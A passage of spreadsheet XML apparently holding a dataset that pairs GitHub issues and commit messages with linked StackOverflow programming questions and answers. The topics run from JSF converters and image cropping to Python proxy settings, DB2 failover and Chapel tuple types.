* all backing beans are @nAmed
* all templates use unified bootstrap templates
* Factories have been removed
* optimization: data retrieval in backing bean getters was moved to
@PostConstruct methods
* HTTP GET parameters use @Inject @param with converters
* FacesConverters are now @nAmed and @Inject DAO objects via OmniFaces
CDI support (http://stackoverflow.com/a/13156834)</t>
  </si>
  <si>
    <t>The @FacesConverter isn't an eligible injection target. Replace it by @ManagedBean or @Named. As you'd like to use CDI as as well, use @Named.
@Named
@ApplicationScoped // I assume that your converter doesn't have any state.
public class MyConverter implements Converter {
    // ...
}
You only need to change the way it's been referenced in the views. You cannot rely on forClass anymore. You'd need to explicitly specify it as #{myConverter}.
&lt;h:inputSomething ... converter="#{myConverter}" /&gt;
or
&lt;h:inputSomething ...&gt;
    &lt;f:converter binding="#{myConverter}" /&gt;
&lt;/h:inputSomething&gt;
If you really need to keep the @FacesConverter in favor of forClass, then you'd need to grab the EJB manually by JNDI. A concrete example is shown in this blog article. I can however not tell that for CDI beans.
The JSF guys have confirmed this embarrassing oversight and they will make the @FacesConverter an eligible injection target in upcoming JSF 2.2, see also JSF spec issue 763 JSF 2.3.
See also:
https://stackoverflow.com/questions/7665673/how-to-inject-ejb-persistencecontext-inject-autowired-etc-in-facesconve
Update if you happen to use JSF utility library OmniFaces, or are open to using it, since its version 1.6, when just having OmniFaces JAR in /WEB-INF/lib, all @FacesConverters (and @FacesValidators) in your webapp automatically become eligible for CDI and EJB injection without any extra effort.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am facing issue in cropping functionality on uploaded image in a .NET 4.6.1 web application.&lt;/p&gt;
&lt;p&gt;I have two similar pages, &lt;code&gt;UploadImage1.aspx&lt;/code&gt; &amp;amp; &lt;code&gt;UploadImage2.aspx&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In &lt;code&gt;UploadImage1.aspx&lt;/code&gt;, we are using JCrop for cropping functionality.&lt;/p&gt;
&lt;p&gt;Including script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type=&amp;quot;text/javascript&amp;quot; src=&amp;quot;https://cdnjs.cloudflare.com/ajax/libs/jquery-jcrop/0.9.9/js/jquery.Jcrop.min.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Initializing JCrop object:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Create variables (in this scope) to hold the Jcrop API and image size
var jcrop_api;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Jcrop for &lt;code&gt;UploadFile&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('#Image1').Jcrop({
    boxWidth: imageWidth,   //Maximum width you want for your bigger images
    boxHeight: imageHeigthOfUploadImage,  //Maximum Height for your bigger images
    onChange: updateCoords,
    onSelect: updateCoords
}, function () {
    // use the Jcrop API to get the real image size
    var bounds = this.getBounds();
    boundx = bounds[0];
    boundy = bounds[1];
    // Store the Jcrop API in the jcrop_api variable
    jcrop_api = this;
    $(&amp;quot;#canvas&amp;quot;).hide();
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On crop&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('#btnCrop').click(function () {
    //Get the Coords from the Hidden controls
    var x1 = $('#x').val();
    var y1 = $('#y').val();
    var width = $('#w').val();
    var height = $('#h').val();
    var canvas = $(&amp;quot;#canvas&amp;quot;)[0];
    var context = canvas.getContext('2d');
    canvas.height = height;
    canvas.width = width;
    let image = document.createElement('img');
    image.onload = function () {
        // Draw the image with the coords defined by the user
        context.drawImage(image, x1, y1, width, height, 0, 0, width, height);
        // Set the resized image to the Image control
        $('#imgCropped').val(canvas.toDataURL());
        $(&amp;quot;#capturedImage&amp;quot;)[0].src = canvas.toDataURL();
        // Needed at the server side to get the image value
        document.getElementById(&amp;quot;&amp;lt;%=ImgExSrc.ClientID%&amp;gt;&amp;quot;).value = canvas.toDataURL();
        // Reset the canvas height &amp;amp; width
        canvas.height = imageHeigth;
        canvas.width = imageWidth;
    };
    image.src = $('#Image1').attr(&amp;quot;src&amp;quot;);
    $(&amp;quot;#canvas&amp;quot;).hide();
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;HTML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;center&amp;quot;&amp;gt;
    &amp;lt;p&amp;gt;
        &amp;lt;b&amp;gt;
            &amp;lt;asp:Label ID=&amp;quot;lblUploadFile&amp;quot; runat=&amp;quot;server&amp;quot; Text=&amp;quot;&amp;lt;%$Resources:Resource, lblUploadFile %&amp;gt;&amp;quot;&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;/b&amp;gt;
    &amp;lt;/p&amp;gt;
    &amp;lt;input type=&amp;quot;file&amp;quot; name=&amp;quot;image_file&amp;quot; id=&amp;quot;image_file&amp;quot; accept=&amp;quot;.jpg,.png,.gif&amp;quot; /&amp;gt;
    &amp;lt;br /&amp;gt;
    &amp;lt;br /&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;table class=&amp;quot;table&amp;quot; border=&amp;quot;0&amp;quot;&amp;gt;
    &amp;lt;tbody&amp;gt;
        &amp;lt;tr&amp;gt;
            &amp;lt;td&amp;gt;
                &amp;lt;img id=&amp;quot;preview&amp;quot; /&amp;gt;
                &amp;lt;img id=&amp;quot;Image1&amp;quot; src=&amp;quot;&amp;quot; style=&amp;quot;display: block&amp;quot; /&amp;gt;
                &amp;lt;canvas id=&amp;quot;canvas&amp;quot; width=&amp;quot;320&amp;quot; height=&amp;quot;240&amp;quot;&amp;gt;&amp;lt;/canvas&amp;gt;
            &amp;lt;/td&amp;gt;
        &amp;lt;/tr&amp;gt;
    &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In &lt;code&gt;UploadImage2.aspx&lt;/code&gt;, we are using CropperJS for cropping functionality.&lt;/p&gt;
&lt;p&gt;Including script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script src=&amp;quot;https://unpkg.com/cropperjs&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Initializing Cropperjs object:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Create variables (in this scope) to hold the Jcrop API and image size
let cropper;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Jcrop for &lt;code&gt;UploadFile&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cropper = new Cropper($('#Image1')[0], {
    viewMode: 3,
    restore: false,
    autoCropArea: 0.5,
    crop(event) {
        $('#x').val(event.detail.x);
        $('#y').val(event.detail.y);
        $('#w').val(event.detail.width);
        $('#h').val(event.detail.height);
    },
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On crop&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('#btnCrop').click(function () {
    //Get the Coords from the Hidden controls
    var x1 = $('#x').val();
    var y1 = $('#y').val();
    var width = $('#w').val();
    var height = $('#h').val();
    var canvas = $(&amp;quot;#canvas&amp;quot;)[0];
    var context = canvas.getContext('2d');
    var aspectRatio = width / height;
    if (aspectRatio &amp;gt; 1) {
        canvas.width = imageWidth;
        canvas.height = imageWidth / aspectRatio;
    } else {
        canvas.height = imageHeigth;
        canvas.width = imageHeigth * aspectRatio;
    }
    let image = document.createElement('img');
    image.onload = function () {
        //Draw the image with the coords defined by the user
        context.drawImage(image, x1, y1, width, height, 0, 0, canvas.width, canvas.height);
        //Set the resized image to the Image control
        $('#imgCropped').val(canvas.toDataURL());
        $(&amp;quot;#capturedImage&amp;quot;)[0].src = canvas.toDataURL();
        //Needed at the server side to get the image value
        document.getElementById(&amp;quot;&amp;lt;%=ImgExSrc.ClientID%&amp;gt;&amp;quot;).value = canvas.toDataURL();
        canvas.height = imageHeigth;
        canvas.width = imageWidth;
    };
    image.src = $('#Image1').attr(&amp;quot;src&amp;quot;);
    $(&amp;quot;#canvas&amp;quot;).hide();
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;HTML&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;center&amp;quot;&amp;gt;
     &amp;lt;p&amp;gt;
         &amp;lt;b&amp;gt;
             &amp;lt;asp:Label ID=&amp;quot;lblUploadFile&amp;quot; runat=&amp;quot;server&amp;quot; Text=&amp;quot;&amp;lt;%$Resources:Resource, lblUploadFile %&amp;gt;&amp;quot;&amp;gt;&amp;lt;/asp:Label&amp;gt;&amp;lt;/b&amp;gt;
     &amp;lt;/p&amp;gt;
     &amp;lt;input type=&amp;quot;file&amp;quot; name=&amp;quot;image_file&amp;quot; id=&amp;quot;image_file&amp;quot; accept=&amp;quot;.jpg,.png,.gif&amp;quot; /&amp;gt;
     &amp;lt;br /&amp;gt;
     &amp;lt;br /&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;div class=&amp;quot;container1&amp;quot;&amp;gt;
     &amp;lt;div style=&amp;quot;&amp;quot;&amp;gt;
         &amp;lt;img id=&amp;quot;preview&amp;quot; /&amp;gt;
         &amp;lt;img id=&amp;quot;Image1&amp;quot; src=&amp;quot;&amp;quot; /&amp;gt;
         &amp;lt;canvas id=&amp;quot;canvas&amp;quot;&amp;gt;&amp;lt;/canvas&amp;gt;
     &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the first case, JCrop crops the image accurately and with good cropped image quality, but it's not supporting in mobile devices, ie. the cropper is not showing on uploaded image in mobile application.&lt;/p&gt;
&lt;p&gt;In second case, CropperJS supporting in mobile devices too but we are loosing image quality of the image ie. once the cropper added on the uploaded image, the image gets zoomed out and blurred.&lt;/p&gt;
&lt;p&gt;Struggling to find following things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;If the JCrop supports on mobile devices? If yes, how can I make it responsive?&lt;/li&gt;
&lt;li&gt;Why the cropperjs reducing quality of image?&lt;/li&gt;
&lt;li&gt;Are these issues caused by the dll's or because of code of setting image size and aspect ratio?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Please suggest any  solution.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C218</t>
  </si>
  <si>
    <t>Moving the webview brigde to React-Native Core
I have decided that, it is time to move this project into core. one of the problem with maintaining this project is not be able to extend the native class and as a result I have to copy and paste the entire source code of WebView implementation of react-native. This makes it very difficult. So what I'm asking is goto this link and vote that one. If I get the confirmation from core-team I will make a PR request to WebView and I will merge this project to core
I found solution here is a link to stackoverflow
https://stackoverflow.com/a/58708882/11013049</t>
  </si>
  <si>
    <t>I found a way to run a vimeo video in react native. simply you've to request on URL to get it's detail config through vimeo id. Inside config you'll find videoUrl, that can be easily run on react-native-video-controls.
Here is example
const VIMEO_ID = '179859217';
fetch(`https://player.vimeo.com/video/${VIMEO_ID}/config`)
      .then(res =&gt; res.json())
      .then(res =&gt; this.setState({
        thumbnailUrl: res.video.thumbs['640'],
        videoUrl: res.request.files.hls.cdns[res.request.files.hls.default_cdn].url,
        video: res.video,
      }));
In Render
&lt;VideoPlayer
        ref={ref =&gt; {
          this.player = ref;
        }}
        source={{uri: this.state.videoUrl}}
        navigator={this.props.navigator}
        fullscreen={true}
        resizeMode={'cover'}
      /&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working on a real time application implemented using in a SOA-style (read loosely coupled components connected via some messaging protocol - JMS, MQ or HTTP).
The architect who designed this system opted to use JMS to connect the components.  This system is real time so there no need to queue up messages should one component fail (the transaction will simply time out).  Further, there is no need for guaranteed delivery or rollback.
In this instance, is there any benefit to using JMS over something like an HTTP web service (speed, resource footprint, etc)?
One thing that I'm thinking is since the JMS approach requires us to set a thread pool size (the number of components listening to a JMS topic/queue), wouldn't a HTTP service be a better fit since this additional configuration is not needed (a new thread is created for each HTTP request making the application scalable to an "unlimited" number of requests until the server runs out of resources).
Am I missing something?
</t>
  </si>
  <si>
    <t>C219</t>
  </si>
  <si>
    <t>We do use a proxy server for the communication with the "outer world".
Thus, the communication with the code example given in the documentation ends up with a communication error.
In order not to set a proxy for each communication step within the code, I implemented the following code from https://stackoverflow.com/questions/31639742/how-to-pass-all-pythons-traffics-through-a-http-proxy:
import os proxy = 'http://&lt;user&gt;:&lt;pass&gt;@&lt;proxy&gt;:&lt;port&gt;' os.environ['http_proxy'] = proxy  os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy
Maybe you could update the documentation with these lines to ease the work for anyone facing the same issue.</t>
  </si>
  <si>
    <t>Linux system first export the environment variables like this
$ export http_proxy="http://&lt;user&gt;:&lt;pass&gt;@&lt;proxy&gt;:&lt;port&gt;"
$ export HTTP_PROXY="http://&lt;user&gt;:&lt;pass&gt;@&lt;proxy&gt;:&lt;port&gt;"
$ export https_proxy="http://&lt;user&gt;:&lt;pass&gt;@&lt;proxy&gt;:&lt;port&gt;"
$ export HTTPS_PROXY="http://&lt;user&gt;:&lt;pass&gt;@&lt;proxy&gt;:&lt;port&gt;"
or in the script that you want to pass through the proxy
import os
proxy = 'http://&lt;user&gt;:&lt;pass&gt;@&lt;proxy&gt;:&lt;port&gt;'
os.environ['http_proxy'] = proxy 
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy
#your code goes here.............
then run python script
$ python my_script.py
UPDATE
And also you can use redsocks With this tool you can redirect silently all your TCP connections to a PROXY with or without authentication. But you have to be carefull because it's for all connections not only for the python.
Windows systems you can use tools like freecap, proxifier, proxycap, and configure to run behind the python executable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When configuring a DB2 LUW connection in Spring Boot using Tomcat, I am seeing issues upon HADR failover where the alternate server is not properly failed over to. Post failover I receive SQLCODE=-1776 indicating the connection is attempting to be made to a standby database. A manual application restart resolves the issue as it will then connect to the alternate failover hostname, so I know the property configurations are working.&lt;/p&gt;
&lt;p&gt;Below is the sample java code tested with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    Connection conn = null;
    try {
      System.out.println(&amp;quot;Connecting to the primary DB2 server...&amp;quot;);
      Properties info = new Properties();
      info.put(&amp;quot;user&amp;quot;, DB_USER);
      info.put(&amp;quot;password&amp;quot;, password);
      info.put(&amp;quot;clientRerouteAlternateServerName&amp;quot;, CLIENT_REROUTE_ALTERNATE_SERVER_NAME);
      info.put(&amp;quot;clientRerouteAlternatePortNumber&amp;quot;, CLIENT_REROUTE_ALTERNATE_PORT_NUMBER);
      info.put(&amp;quot;maxRetriesForClientReroute&amp;quot;, MAX_RETRIES_FOR_CLIENT_REROUTE);
      info.put(&amp;quot;retryIntervalForClientReroute&amp;quot;, RETRY_INTERVAL_FOR_CLIENTREROUTE);
      info.put(&amp;quot;enableSeamlessFailover&amp;quot;, ENABLE_SEAMLESS_FAILOVER);
      conn = DriverManager.getConnection(JDBCURL, info);
      String hostName = getHostName(conn);
      return &amp;quot;Connected to &amp;quot;
          + conn.getMetaData().getDatabaseProductName()
          + &amp;quot; &amp;quot;
          + conn.getMetaData().getDatabaseProductVersion()
          + &amp;quot; &amp;quot;
          + HOST_NAME_LABEL
          + hostName;
    } catch (SQLException ex) {
      System.err.println(&amp;quot;An error occurred during connection or query execution:&amp;quot;);
      ex.printStackTrace();
      return &amp;quot;Failed to make connection!&amp;quot;;
    } finally {
      if (conn != null) {
        try {
          conn.close();
          System.out.println(&amp;quot;Connection closed.&amp;quot;);
        } catch (SQLException e) {
          // Ignore closing errors
        }
      }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I believe this issue may lie within Spring/Tomcat as replicating this code in plain Java + JDBC results in this issue going away with the alternate server properly failed over to. For more context, we had similar configurations using JNDI when connecting to our old WebSphere servers and did not see this issue.&lt;/p&gt;
&lt;p&gt;I was wondering if anyone has experienced this issue before and has any resolution. Really trying to narrow down whether it whether there is incompatibility with this client rerouting HADR failover on Tomcat servers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C22</t>
  </si>
  <si>
    <t>feature/color_picker - implemented a simple color picker and ability 
to change the color of screen background
-Implemented a simple color picker via ColorPicker.java and activity_color_picker.xml
-Could not implement in SettingsActivity.java using preference xml files for unknown reasons.
(will look into this in the future, maybe)
-Currently, the user can access the color picker via the overflow options menu.  This launches the color picker with sliders for ARGB values.
The user can see the actual color change  as the sliders are dragged and the textual representation of the color in Android Studio's naming scheme
for colors.
-Once the user clicks the button labeled "change background color", the color value is saved to the SharedPreferences file, which all screens in
the app then use to retrieve the new color value(s) and call SetBackgroundColor to change the root layout in their respective .xml file to the new color.
Files Added:
ColorPicker.xml
activity_color_picker.xml
Resources Used:
https://stackoverflow.com/questions/6495898/findviewbyid-in-fragment
https://stackoverflow.com/questions/7378636/setting-background-colour-of-android-layout-element
https://stackoverflow.com/questions/16008918/how-to-change-background-color-across-activities</t>
  </si>
  <si>
    <t>You can use simple color resources, specified usually inside res/values/colors.xml.
&lt;color name="red"&gt;#ffff0000&lt;/color&gt;
and use this via android:background="@color/red". This color can be used anywhere else too, e.g. as a text color. Reference it in XML the same way, or get it in code via getResources().getColor(R.color.red).
You can also use any drawable resource as a background, use android:background="@drawable/mydrawable" for this (that means 9patch drawables, normal bitmaps, shape drawables, ..).</t>
  </si>
  <si>
    <t>what you can do is set a SharedPreferences value to what the user selects, and at the start of each of your activities, set that value to the background colour of your layout. That is the best way I see to solving this.
So in all of your activities, you would set them to the value from the SharedPreferences and if not set use your default one. As for storing the possible values, you can either use the XML file or just hard code the values in one global class, although the former is preferable.
Look here and see what they did (Android-page-about-data-storage)
Edit: If you are going to keep it simple like that, just background colour, then you can do something like this:
|- Keep these somewhat global, maybe in a class and access them as needed,
// Make sure to maintain the connection
String[] SKINS = {"Light", "Dark"};
int[] COLOURS = {Color.CYAN, Color.BLACK};
|- For the onItemClick(),
@Override
public void onItemClick(AdapterView&lt;?&gt; parent, View view,
int position, long id)
{
    // You may wish to make these two variables class-global
    SharedPreferences settings = getPreferences(MODE_PRIVATE);
    SharedPreferences.Editor editor = settings.edit();
    editor.putInt("mskin", COLOURS[position]);
    editor.commit();
    // For on the spot changes
    listView.setBackgroundColor(COLOURS[position]);
    // Your other code, as you wish, before or after, depends on how you need it.
|- As for your other activities, or at the onCreate() of all activities,
SharedPreferences settings = getPreferences(MODE_PRIVATE);
listView.setBackgroundColor(settings.getInt("mskin", COLOURS[0]));</t>
  </si>
  <si>
    <t>Use getView() or the View parameter from implementing the onViewCreated method. It returns the root view for the fragment (the one returned by onCreateView() method). With this you can call findViewById().
java
@Override
public void onViewCreated(View view, @Nullable Bundle savedInstanceState) {
    ImageView imageView = (ImageView) getView().findViewById(R.id.foo);
    // or  (ImageView) view.findViewById(R.id.foo); 
} 
As getView() works only after onCreateView(), you can't use it inside onCreate() or onCreateView() methods of the fragment .</t>
  </si>
  <si>
    <t xml:space="preserve">While going through university and from following the development of SO, I've heard a lot about the Model-View-Controller architectural design pattern. I inadvertently used the MVC pattern even before I knew what it was, and still use it in my everyday job. From what I've seen, it's probably the most popular pattern used today. What I haven't heard much about though, are the alternative patterns you can use instead of MVC. What options are there, and for what reasons would you decide to use them over MVC? I'm also interested in knowing the types of systems they are typical of being used for. Finally, what are the pros and cons that come along with using them?
</t>
  </si>
  <si>
    <t>C220</t>
  </si>
  <si>
    <t>Make "Searchkick.search" for multi-model searches work with Rails low-level caching
Is your feature request related to a problem? Please describe.
The problem I have is slow search queries. Sometimes more than 5-10 seconds (esp. single keyword searches). The solution I want is acceleration of search queries using caching. I think rails low level caching with solid-cache is a good fit. However, the object generated by Searchkick.search(query, params) is always unique even for the same query and same params, thus busting the cache..
Describe the solution you'd like
I would like the ability to cache multi-model search results returned by searchkick using solid-cache for improved performance.
Additional context
Another StackOverflow question about the same issue: https://stackoverflow.com/questions/77636414/how-can-i-cache-the-results-returned-by-searchkick-in-rails-using-low-level-cach</t>
  </si>
  <si>
    <t>How can I cache the results returned by searchkick in rails using low level caching?
It seems the returned items object is unique on every search, thus busting the cache?
Here is some sample code I'm using.. in my controller
cache_key = ["results_controller", @store, @category, @search, @page]
@items = Rails.cache.fetch(cache_key, expires_in: 1.week) {Searchkick.search(@search...)}
I then have a
@sid = @items.search.id
down below to track searches.. I believe this search_id is unique per search, thus busting the cache.. how can I cherry pick the attributes returned in the
.search
method so as to preserve the caching?
This is for a multi-model search query.. hence using
Searchkick.search()
instead of
YourModel.search()</t>
  </si>
  <si>
    <t xml:space="preserve">I've introduced visitors as one of core architecture ideas in one of my apps. I have several visitors that operate on a same stuff. Now, how should I test it? Some tests  I'm thinking of are a bit larger then a unit test should be (integration test? whatever) but I still wanna do it. How would you test code like the C++ sample from wiki art on [external-link]
</t>
  </si>
  <si>
    <t>C221</t>
  </si>
  <si>
    <t>Currently if WebGL is not supported the player has no guidance in the default template. Instead the engine_template.html should include some JS to detect if WebGL is supported and show text explaining that WebGL is not supported, they need to use a browser which supports WebGL.
https://developer.mozilla.org/en-US/docs/Web/API/WebGL_API/By_example/Detect_WebGL
https://stackoverflow.com/questions/54401577/check-if-webgl2-is-supported-and-enabled-in-clients-browser</t>
  </si>
  <si>
    <t xml:space="preserve">The way you're supposed to check is just to see if trying to get a webgl2 context succeeds or fails
const gl = document.createElement('canvas').getContext('webgl2');
if (!gl) {
  console.log('your browser/OS/drivers do not support WebGL2');
} else {
  console.log('webgl2 works!');
}
You can also check if window.WebGL2RenderingContext exists to try to guess if it's the browser that doesn't support WebGL2 or the user's OS/GPU/Drivers.
const gl = document.createElement('canvas').getContext('webgl2');
if (!gl) {
  if (typeof WebGL2RenderingContext !== 'undefined') {
    console.log('your browser appears to support WebGL2 but it might be disabled. Try updating your OS and/or video card drivers');
  } else {
    console.log('your browser has no WebGL2 support at all'); 
  }
} else {
  console.log('webgl2 works!');
}
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to set up microcks-uber to help with our integration testing locally. I've set up the containers, using VSCode devcontainers like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;microcks:
    image: quay.io/microcks/microcks-uber:1.10.0-native
    ports:
      - &amp;quot;9090:8080&amp;quot;
    environment:
      - TEST_CALLBACK_URL=http://microcks:8080
      # - ASYNC_MINION_URL=http://microcks-async-minion:8081
    volumes:
      - &amp;quot;./application.properties:/deployments/config/application.properties&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm also using kcat, to try to intertact with the topics: &lt;code&gt;kcat -b microcks:8080 -t PetstoreAsynchronousAPI-1.0.0-receiveNewPetCreateEvent&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Using the tutorial schema:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;asyncapi: 3.0.0
info:
  title: Pets API
  version: 1.0.0
  description: |-
    Petstore API   
defaultContentType: application/json
components:
  messages:
    pet:
      payload:
        $ref: '#/components/schemas/Pet'
      examples:
        - name: Zaza
          payload:
            id: 1
            name: Zaza
        - name: Tigress
          payload:
            id: 2
            name: Tigress
  schemas:
    Pet:
      type: object
      properties:
        id:
          format: int64
          type: integer
        name:
          type: string
      required:
        - id
        - name
channels:
  newPetCreated:
    address: new-pet
    messages:
      newPetCreated:
        $ref: '#/components/messages/pet'
operations:
  receiveNewPetCreateEvent:
    action: receive
    channel:
      $ref: '#/channels/newPetCreated'
    messages:
      - $ref: '#/channels/newPetCreated/messages/newPetCreated'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Everytime I try to run the kcat commands, an error is returned &lt;code&gt;Receive failed: Invalid response size 1213486160 (0..100000000): increase receive.message.max.bytes&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I've tried adding a &lt;code&gt;application.properties&lt;/code&gt; file containing &lt;code&gt;receive.message.max.bytes=200000000&lt;/code&gt; mounted at &lt;code&gt;deployments/config&lt;/code&gt; as the &lt;a href="https://microcks.io/documentation/references/configuration/application-config/#async-api-support-1" rel="nofollow noreferrer"&gt;docs&lt;/a&gt; seem to suggest, but this doesn't resolve things.&lt;/p&gt;
&lt;p&gt;Are we able to adjust this value in the uber distribution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C222</t>
  </si>
  <si>
    <t>Limit maps addresses to NYC only when searching for address (#421)
See comments at https://reportedcab.slack.com/archives/C9VNM3DL4/p1684710141854209
&gt; Justin
&gt; 2 feature requests -
&gt; limit maps addresses to NYC only when searching for address
&gt; 2 option to lockin an address or street so it doesn't keep changing when making many reports in the same area.
&gt;
&gt; Justin
&gt; https://stackoverflow.com/questions/8282026/how-to-limit-google-autocomplete-results-to-city-and-country-only</t>
  </si>
  <si>
    <t>You can try the country restriction
function initialize() {
 var options = {
  types: ['(cities)'],
  componentRestrictions: {country: "us"}
 };
 var input = document.getElementById('searchTextField');
 var autocomplete = new google.maps.places.Autocomplete(input, options);
}
More info:
ISO 3166-1 alpha-2
can be used to restrict results to specific groups. Currently, you can use componentRestrictions to filter by country.
The country must be passed as as a two character, ISO 3166-1 Alpha-2 compatible country code.
Officially assigned country codes</t>
  </si>
  <si>
    <t xml:space="preserve">I want to run a background task that reads input from a TextReader and processes it a line at a time. I want the background task to block until the user types some text into a field and clicks the submit button. Is there some flavour of TextReader that will block until text is available and lets you somehow add more text to the underlying source?
I thought that a StreamReader and StreamWriter pointing to the same MemoryStream might work, but it doesn't seem to. The StreamReader sees that the MemoryStream is empty at the start, and never checks again.
I realize that it would be easier to write a ProcessLine() method and call it whenever the user clicks the submit button. However, I'm trying to design a plug-in architecture, and I'd like the plug ins to look like old-fashioned console apps with an input stream and an output stream. I want the plug in's input stream to just block until the user clicks the submit button with some input text.
</t>
  </si>
  <si>
    <t>C223</t>
  </si>
  <si>
    <t>Two feature request for tuples
1) Given a tuple type, it would be nice to be able to index into
   it to get the type of one of its fields.  I suspect that this
   would not be so hard to implement, but haven't tried much yet.
2) Given a heterogeneous tuple, it seems that one should be able
   to 'param' iterate over it.  At first this might seem unintuitive
   because we think of the index variable of a loop as being a single
   variable.  But for a param loop that is fully unrolled, it is
   probably more appropriate to think of each unrolling as giving that
   copy of the loop its own param index variable, meaning that each
   could have a different type.
Both of these were motivated by Brian Dolan's StackOverflow question:
https://stackoverflow.com/questions/50478234/how-to-keep-a-list-of-acceptable-types-for-comparison-in-chapel/50486342#50486342</t>
  </si>
  <si>
    <t>There are two tools that I think you'll want to use for this pattern:
1) The first is Chapel's cast operator (
:
).  For classes, casting is similar to C++'s dynamic cast.  In short, given a class object like the following instance of
GoodStudent
:
var brian = new GoodStudent();
a cast of the object to a class type will return
nil
if the object is not a subclass of that class and the class reference if it is.  Thus:
...(brian: Student != nil)...           // will evaluate to true
...(brian: BadStudent != nil)...        // will evaluate to false
...(brian: GoodStudent != nil)...       // will evaluate to true
...(brian: ExcellentStudent != nil)...  // will evaluate to false
Thus, to test for a
GoodStudent
or an
ExcellentStudent
, you could write:
if (student:GoodStudent != nil || student:ExcellentStudent != nil) then
  return "YES!";
Alternatively, if every
ExcellentStudent
is also a
GoodStudent
, you might consider making it a subclass of
GoodStudent
in your class hierarchy rather than a sibling to it.  In that case, you could simply write your conditional as:
if student:GoodStudent != nil then return "YES!";
since both
GoodStudent
and
ExcellentStudent
would return true for this conditional.
As an important note, it may be tempting to simply write this conditional as:
if student.type == GoodStudent
but this would not give the correct behavior in the context of your procedure since it is declared as follows:
proc accept(student: Student) { ... }
Specifically, the
.type
query will return the static (compile-time) type of a class object, and in the context of this routine, the static type of
student
is
Student
due to its formal type.  So comparing its static type would never match
GoodStudent
, even if the object's dynamic type was
GoodStudent
.  Using the dynamic cast addresses this by changing from a static test to a dynamic one.  Another approach would be to make the
accept()
procedure completely generic, as follows:
proc accept(student) { ... }
but then you open up the floodgates by permitting other non-
Student
types to be passed in.
2) The second thing you need (and the focus of your question) is a tuple type, which is probably the best / lightest weight way to create a collection of types.  Chapel only supports arrays of values, not types, so the following line in your code is not legal:
var acceptableStudentTypes: [1..2] = [GoodStudent, ExcellentStudent];
Instead, create a tuple type to store all the types you want to compare against:
type acceptableStudentTypes = (GoodStudent, ExcellentStudent);
This leads to my suggested solution (
try it online
):
class Student {
}
class BadStudent: Student {
}
class GoodStudent: Student {
}
class ExcellentStudent: Student {
}
// a tuple of acceptable types                                              
type acceptableStudentTypes = (GoodStudent, ExcellentStudent);
class AdvancedBasketWeaving {
  proc accept(student: Student) {
    // iterate over the tuple's size                                        
    for param i in 1..acceptableStudentTypes.size do
      // see if dynamically casting the student to the type "works"         
      if student: acceptableStudentTypes(i) != nil then
        return "YES!";
    return "Computer says 'No'";
  }
}
var course = new AdvancedBasketWeaving();
writeln(course.accept(new Student()));            // Computer says 'No'     
writeln(course.accept(new BadStudent()));         // Computer says 'No'     
writeln(course.accept(new GoodStudent()));        // YES!                   
writeln(course.accept(new ExcellentStudent()));   // YES!
Note that I've moved the
acceptableStudentTypes
declaration from the class scope (which is logical and where you had it) to the module scope.  This is because of an apparent bug in Chapel which I've
filed an issue against
.
Or, if you can make
ExcellentStudent
a subclass of
GoodStudent
, I think the following is much nicer (
try it online
):
class Student {
}
class BadStudent: Student {
}
class GoodStudent: Student {
}
class ExcellentStudent: GoodStudent {
}
class AdvancedBasketWeaving {
  proc accept(student: Student) {
    if student: GoodStudent != nil then
      return "YES!";
    return "Computer says 'No'";
  }
}
var course = new AdvancedBasketWeaving();
writeln(course.accept(new Student()));            // Computer says 'No'     
writeln(course.accept(new BadStudent()));         // Computer says 'No'     
writeln(course.accept(new GoodStudent()));        // YES!                   
